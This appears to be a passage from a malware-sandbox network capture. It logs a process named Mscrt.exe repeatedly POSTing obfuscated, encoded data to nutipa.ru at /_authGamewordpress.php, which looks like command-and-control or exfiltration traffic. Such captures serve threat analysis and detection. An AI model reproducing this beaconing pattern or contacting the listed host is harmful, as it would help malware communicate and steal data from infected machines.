Dec 15, 2024 04:17:41.399036884 CET	800	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2BDApD61gn%2FmHnSGh923%2Ffe6BXBIy5aLWHQOOzIsG6j8aA%2BqvvUUvkvsWWMwbJBLP9Am%2F4IyFZwKMug64cHhlVcqo7fY5ivABqdbj%2Fhh3uIGkznhCqBvomk5O0c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348333fa243c8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4282&min_rtt=2105&rtt_var=5145&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=74764&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49761	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:41.647752047 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:17:41.997998953 CET	2536	OUT	Data Raw: 55 54 43 5a 5a 5d 5d 56 5d 5a 56 51 50 5f 57 54 55 52 5e 40 5a 54 5b 59 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UTCZZ]]V]ZVQP_WTUR^@ZT[YYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'?_>\?"%?'\ %-&X1)#<'^=#9;;.F'#P
Dec 15, 2024 04:17:42.733755112 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:42.967952013 CET	791	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=90nANZe6V5lqObq5466O1tT%2BMSRUm1CeeVABjsdtsW0zSKw09bMmtzp1zdtxFx0dykglLm2BpCdoBFLSDzzK3nMlxv0kvtqWyN886XwSHcir6vY0BwRpWEpFz8E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f23483d2cdec481-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6834&min_rtt=1605&rtt_var=11061&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=33608&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49762	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:43.267647982 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:43.622973919 CET	2536	OUT	Data Raw: 50 53 43 59 5f 56 5d 52 5d 5a 56 51 50 5a 57 5a 55 57 5e 49 5a 51 5b 53 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PSCY_V]R]ZVQPZWZUW^IZQ[SYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$?=:9#Z#/=+-8#Y4Z1"%X=T3;0&^+3;.F'#P /
Dec 15, 2024 04:17:44.366889000 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:44.604960918 CET	790	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aQHIWfeZFyNkOmZ4h%2BFBvvlzUvTQD3KU84oaimGSfxDkdshp4dAl6MP8ESXdChMQ3FiqGrUWuoGcekH2CSE27mGj37uPX8ZDkG8jhN4GgOrQ9p97Hvjq1tEEnpQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348474830f795-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5026&min_rtt=1699&rtt_var=7291&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=51562&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49763	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:44.849709988 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:45.201276064 CET	2536	OUT	Data Raw: 55 54 46 5f 5f 5c 5d 53 5d 5a 56 51 50 5a 57 54 55 5c 5e 47 5a 56 5b 52 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UTF__\]S]ZVQPZWTU\^GZV[RYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$^(>[**+!<:C<.'7?&!1=1W)0 %>^=0=/.F'#P /
Dec 15, 2024 04:17:45.935162067 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:46.184825897 CET	799	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uf4PXtd0ZU%2BhyOQusF05yNQM7el5pTNRXdTsWWVDiJj1wESJJ9NFXK1owpaBmrxl0W6k7aFMh8W111k9iFudTswCgAJSu29U9kyR5hAH%2FF9gRp%2FIpr%2F%2FwT2NZsE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234851286b423a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3231&min_rtt=1704&rtt_var=3694&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=104839&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49765	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:46.434150934 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:46.779474974 CET	2536	OUT	Data Raw: 50 52 43 50 5f 5b 58 55 5d 5a 56 51 50 59 57 55 55 52 5e 43 5a 55 5b 5c 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PRCP_[XU]ZVQPYWUUR^CZU[\YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$]+Y?)8":+ #, Y1>&%=#83_=3!S-+.F'#P #
Dec 15, 2024 04:17:47.520646095 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:47.763298988 CET	792	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L16BvGVupqb6ZakTSdGR18VfrKUUDj16XyHY66ohoW2bMnQXinpAmfnpBwpmReF8ggUELLRpGL%2F4qjVjZ%2BolUAN65cjDCShqV31uQp0LheHRHnvUtiNenxarl3o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f23485b0de44357-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4255&min_rtt=1620&rtt_var=5879&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=64300&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49766	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:48.014309883 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:17:48.373435974 CET	2536	OUT	Data Raw: 50 57 43 51 5a 5f 58 53 5d 5a 56 51 50 5a 57 56 55 5c 5e 43 5a 50 5b 5f 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PWCQZ_XS]ZVQPZWVU\^CZP[_YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'(=)?<#?:<-3X /X1.]&!U3Z3="_?U-;.F'#P /
Dec 15, 2024 04:17:49.102054119 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:49.352139950 CET	798	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MKL8AlPeyCiSWP1i%2FAFc5Z4L0Uhl9EDh9n4EifdCr%2FhGIZROXfUWnEzlaloPAzjh0jki6zc%2Fhi69PaAhXM1CSaaL7IjUrDdfoBS6wxD%2Fl9sszwwSK%2FgH24viVYQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234864ecac238a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4150&min_rtt=1782&rtt_var=5405&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=70425&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49767	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:49.606009007 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:49.951462984 CET	2536	OUT	Data Raw: 50 56 46 5b 5f 5c 58 55 5d 5a 56 51 50 5a 57 57 55 5c 5e 47 5a 56 5b 52 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PVF[_\XU]ZVQPZWWU\^GZV[RYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$_<="97Y"<9?=+7 [212.>=#+X0^( 98;.F'#P /
Dec 15, 2024 04:17:50.692832947 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:50.948652983 CET	798	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CIUXruIgyLC%2F3i4Ki4YlDzkz67mDeUw1ObZeA6WQTcgBQT7JMWMdaniT%2BayhMJr29kdkVNHH9MjoUu3Ai3QAWB4W0%2B88Z3REkWFl%2BTqpSzhQzmYJrU4zbdIK%2Bx0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f23486edd1d5e6e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4709&min_rtt=1999&rtt_var=6170&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=61655&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49768	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:51.195297956 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49769	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:51.461632967 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 1424 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:51.810861111 CET	1424	OUT	Data Raw: 55 53 43 5e 5a 5a 58 52 5d 5a 56 51 50 5b 57 56 55 50 5e 42 5a 5e 5b 5f 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: USC^ZZXR]ZVQP[WVUP^BZ^[_YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^')."?)#X")-04/$]&>%>V*3#^3X>_<&,.F'#P +
Dec 15, 2024 04:17:52.571393013 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:52.821367025 CET	948	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JLOGY2yV9atNCERCZ7VvIDxNZmCgo2PGdJ%2BklRmonUiJzyN3zoAiIOmzBIGPBHw74KPH8idzAGr2peZA%2FL9gfgKYhQp1zoSdjE4MS%2BrOfhO30H5tj%2FH4gkviHtw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f23487a99bb0c92-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18850&min_rtt=14007&rtt_var=14939&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1744&delivery_rate=27676&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 3a 00 36 04 2e 1d 20 3e 0e 52 3a 05 29 52 2b 56 38 06 30 0b 31 59 27 38 09 15 29 13 0e 0f 32 17 0f 1c 22 22 35 57 2b 27 0f 5d 25 36 21 51 03 11 22 5a 26 2d 2f 03 3d 3a 3c 5d 26 32 37 5c 32 04 27 06 28 28 25 0c 33 38 38 0d 23 07 23 0f 2e 5c 27 00 29 2a 30 02 2e 2d 2d 08 23 1c 2e 53 0c 17 25 5b 3f 07 26 12 20 0c 26 0c 24 2f 3c 0b 21 39 3a 1d 3d 0d 02 55 24 0a 3b 52 24 3e 38 52 20 33 3d 1a 26 03 3d 02 23 1c 2a 1e 29 22 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98:6. >R:)R+V801Y'8)2""5W+']%6!Q"Z&-/=:<]&27\2'((%388##.\')0.--#.S%[?& &$/<!9:=U$;R$>8R 3=&=#)"%\ .R4]T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49770	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:51.585724115 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:51.935749054 CET	2536	OUT	Data Raw: 55 55 43 5d 5f 5c 5d 56 5d 5a 56 51 50 5b 57 54 55 50 5e 46 5a 51 5b 5c 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UUC]_\]V]ZVQP[WTUP^FZQ[\YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'<."Y=/]#<=)-#4?8[2.=2>!W#'._+U*8+.F'#P +
Dec 15, 2024 04:17:52.676433086 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:52.944699049 CET	799	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ixAVqtqSSEo1mTtyggx%2BVsN7TCgmz1uJwx5O0XxL%2Bd8LcmZSE8suM7hr3ZWRiOJ%2FqKCRCmIWZWEXaAmt70hCSCb%2BDvcJRLBHEgrrIXs62GLZcT6qlbQ%2BrszCYbs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f23487b39da42de-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8942&min_rtt=1601&rtt_var=15283&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=24198&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49771	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:53.204611063 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:17:53.560668945 CET	2536	OUT	Data Raw: 55 55 43 58 5f 56 58 55 5d 5a 56 51 50 5e 57 56 55 5d 5e 48 5a 55 5b 52 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UUCX_VXU]ZVQP^WVU]^HZU[RYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$?"Y=)85).,4,+%="^%-"*;_3]?>;;.F'#P ?
Dec 15, 2024 04:17:54.290401936 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:54.534948111 CET	804	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qjf%2FlQeCEJB9xGlXC8%2F8n1%2FFvAB23%2B0sQYxGsQITxyk5EIdc%2BfRhEUbJk5OuJtbOZsPSLaG8DiPzG1bOXy83J2VRyr7S%2FGExr%2FT%2BeYGomSBz8F8tqUoQfJVTQnQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348855c4343a1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4047&min_rtt=1604&rtt_var=5488&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=69030&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49772	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:54.772380114 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:55.146585941 CET	2532	OUT	Data Raw: 50 54 43 5c 5a 5d 58 55 5d 5a 56 51 50 58 57 56 55 55 5e 44 5a 55 5b 5d 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PTC\Z]XU]ZVQPXWVUU^DZU[]YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^')=)$"<)<; Y41>)%.!*#/0=)<9T8;.F'#P 3
Dec 15, 2024 04:17:55.857877970 CET	25	IN	HTTP/1.1 100 Continue
